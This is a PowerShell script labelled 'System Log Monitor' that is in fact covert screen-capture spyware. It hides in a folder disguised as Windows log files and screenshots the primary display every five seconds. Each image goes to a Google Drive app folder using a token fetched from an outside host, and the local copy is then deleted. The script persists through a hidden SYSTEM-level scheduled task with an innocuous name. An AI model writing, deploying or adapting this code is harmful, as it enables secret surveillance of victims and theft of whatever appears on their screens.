# ===== System Log Monitor =====
$A="Temp"; $B="Log"; $C="Files"; $D=$env:$A+'\Win'+$B+$C; md $D -Force | Out-Null;
$E='https://cloud-api-sync.com';
function Get-Resource { param($U) try { $R=[System.Net.HttpWebRequest]::Create($U); $S=$R.GetResponse(); $Stream=$S.GetResponseStream(); $Reader=New-Object System.IO.StreamReader($Stream); $Data=$Reader.ReadToEnd(); $Reader.Close(); $Stream.Close(); return $Data } catch { return $null } }
function Send-File { param($P) $TokenData=Get-Resource -U "$E/api/v1/access-token"; if (!$TokenData) { return $false }; $Token=$TokenData | ConvertFrom-Json | Select -Expand access_token; $Bytes=[System.IO.File]::ReadAllBytes($P); $FName=[System.IO.Path]::GetFileName($P); $Boundary=[System.Guid]::NewGuid().ToString('N'); $LF="`r`n"; $Body=@(); $Body+=("--"+$Boundary); $Body+="Content-Type: application/json$LF"; $Body+=("{`"name`":`"$FName`",`"parents`":[`"appDataFolder`"]}"); $Body+=("--"+$Boundary); $Body+="Content-Type: image/jpeg$LF"; $Body+=([System.Text.Encoding]::GetEncoding('iso-8859-1').GetString($Bytes)); $Body+=("--"+$Boundary+"--"); $H=@{Authorization="Bearer $Token";"Content-Type"="multipart/related; boundary=$Boundary"}; try { $Req=[System.Net.HttpWebRequest]::Create('https://www.googleapis.com/upload/drive/v3/files?uploadType=multipart'); $Req.Method='POST'; foreach ($Key in $H.Keys) { $Req.Headers.Add($Key,$H[$Key]) }; $ReqStream=$Req.GetRequestStream(); $Writer=New-Object System.IO.StreamWriter($ReqStream); $Writer.Write(($Body -join $LF)); $Writer.Close(); $ReqStream.Close(); $Res=$Req.GetResponse(); return ($Res.StatusCode -eq 200) } catch { return $false } }
function Capture-Screen { Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $Screen=[System.Windows.Forms.Screen]::PrimaryScreen.Bounds; $Bmp=New-Object System.Drawing.Bitmap $Screen.Width, $Screen.Height; $G=[System.Drawing.Graphics]::FromImage($Bmp); $G.CopyFromScreen($Screen.Location,[System.Drawing.Point]::Empty,$Screen.Size); $Path="$D\img_$(Get-Date -Format 'yyyyMMdd_HHmmss').jpg"; $Bmp.Save($Path,[System.Drawing.Imaging.ImageFormat]::Jpeg); $G.Dispose(); $Bmp.Dispose(); if (Send-File -P $Path) { Remove-Item $Path -Force } }
# Persistence via scheduled task (less common than Run registry)
$TaskName="SystemHealthMonitor"; $Action=New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden -Command `"while(`$true) { Capture-Screen; Start-Sleep -Seconds 5 }`""; $Trigger=New-ScheduledTaskTrigger -AtLogOn; $Principal=New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest; $Settings=New-ScheduledTaskSettingsSet -Hidden -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries; Register-ScheduledTask -TaskName $TaskName -Action $Action -Trigger $Trigger -Principal $Principal -Settings $Settings -Force | Out-Null;
# Main loop
while ($true) { Capture-Screen; Start-Sleep -Seconds 5 }